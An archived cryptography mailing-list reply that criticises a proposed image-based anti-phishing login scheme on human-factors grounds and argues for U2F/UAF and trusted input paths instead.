[Cryptography] [FORGED] Re: So please tell me. Why is my solution wrong?

Natanael natanael.l at gmail.com
Tue Feb 14 18:54:25 EST 2017


Den 14 feb. 2017 21:08 skrev "Joseph Kilcullen" <kilcullenj at gmail.com>:

On 13-Feb-17 3:29 PM, Theodore Ts'o wrote:

>
> The above is something which *is* applicable to your solution.  If you
> don't believe it, or believe that your solution is somehow special,
> you are welcome to bankroll some human factors lab to do a study
> specific to your design...
>

True but I figured people who understand cryptography should 'get it' that
it's just a shared secret.


We get it. But many of us knows it isn't enough, which is why we skipped
right to trying to explain why it isn't enough.

HCISec is the field of study. Human computer interaction studies, focused
on security.

Since the image is shared between 'your web browser' and 'you' a MITM
attack would involve the criminal standing between you and your computer
monitor!! I'm sure this happens but its not called a phishing attack.


Shoulder surfing. Or perhaps just abusing the graphics card to steal the
image buffer?

http://slashdot.org/story/305073

http://ieeexplore.ieee.org/document/6956554/

With my solution a MITM attack must remove TLS entirely or substitute a new
TLS certificate. Either way the user, or your browser, will see something
is happening. The login window won't appear if TLS is missing. If a new
certificate is used then who's identity or CA will be used in it? The
computer user will see the fake identity named on the login window.


But they won't. They typically don't notice and and don't know what to look
for.

https://en.wikipedia.org/wiki/Change_blindness

https://arstechnica.com/security/2015/03/mris-show-our-
brains-shutting-down-when-we-see-security-prompts/

And phishing works because people slip up. People forget. People become
tired.

http://ieeexplore.ieee.org/abstract/document/6894474/

http://www.usablesecurity.org//emperor/

https://www.schneier.com/blog/archives/2016/10/security_design.html

https://www.internetsociety.org/doc/neural-signatures-user-centered-security-fmri-study-phishing-and-malware-warnings

Oh, and did anybody mention dyslexics yet?

Right now users look for a picture of a padlock! If pictures of padlocks
are proper cryptography authentication mechanisms then find me a book, or
paper, which documents this cryptography authentication mechanism. Or an
army which uses this tea leaf reading level cryptography solution!


It has the same practical effect if it has a protected UI surface to render
in. Such as if the URL bar can't be hidden.

The custom image just doesn't beat a custom color theme. In particular
since it would be shared for everything you do.

As previously explained, the names will never be more meaningful than the
domain name itself. There's no practical chance you'll recognize the
organization name as fake if you didn't react on the domain.

The image has no effect on security. There's nothing that it does that you
can't achieve with better URL domain highlighting (perhaps again with a
unique color scheme, to prevent forgery?). The image just says "read this
name and see if it is right", which we already know don't work.

It also literally does nothing meaningful to protect you if you share the
raw password with the site anyway - the presence of a unique personal image
does nothing if you already failed to identify the domain as fake. The site
will be getting your password anyway.

---

Muscle memory is infinitely more reliable than depending on awareness and
recognition. Make it mentally expensive to do the wrong thing and cheap to
do the right thing!

U2F / UAF which binds to both the domain name / certificate and TLS session
is infinitely more effective. You just can't get it wrong!
You may call this complexity, but it is the right kind of complexity that
helps us. It is already implemented and works. The design is fairly simple
too! It doesn't change anything outside requiring a small addition to the
browser and server. It doesn't modify the TLS protocol or CA behavior or
certificates, it uses them as they already are.

Using it means that *you authenticate to the browser* and not to the server
(there's your shared secret!), while the browser securely authenticates to
the server on your behalf (based on which server it is talking to).

Forcing users to choose and remember images and always pay attention is a
UX complexity that will fail.

And forcing a change in CA policies will fail - there's over 600
intermediate CA:s that needs to all cooperate, as well as all browsers!


Trusted inputs simply beats automatic prompts and forced awareness. Logins
are just like security warnings to people, something to quickly get around
- so lets not give the control over them to untrusted parties.

As I said before, requiring that the user uses a secure input to initiate
the interaction / login process would be infinitely more secure.

By for example using a key combo (or a button on a security hardware token)
that can't be intercepted or faked in combination with an authentication
protocol that can't be phished (like U2F / UAF), you train the user to only
use prompts he intentionally triggered and simultaneously help prevent
unwanted authentication / authorization of anything he didn't intend (like
not accidentally approving a bank transfer).

It not only blocks phishing and preserves the password protection against
nosy colleagues, but it also provides a defense against for example XSS
attacks (as does other 2FA) and exploits against password autofill;

https://github.com/anttiviljami/browser-autofill-phishing

https://www.theguardian.com/technology/2017/jan/10/browser-autofill-used-to-steal-personal-details-in-new-phising-attack-chrome-safari
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://www.metzdowd.com/pipermail/cryptography/attachments/20170215/b9fea6df/attachment.html>


More information about the cryptography mailing list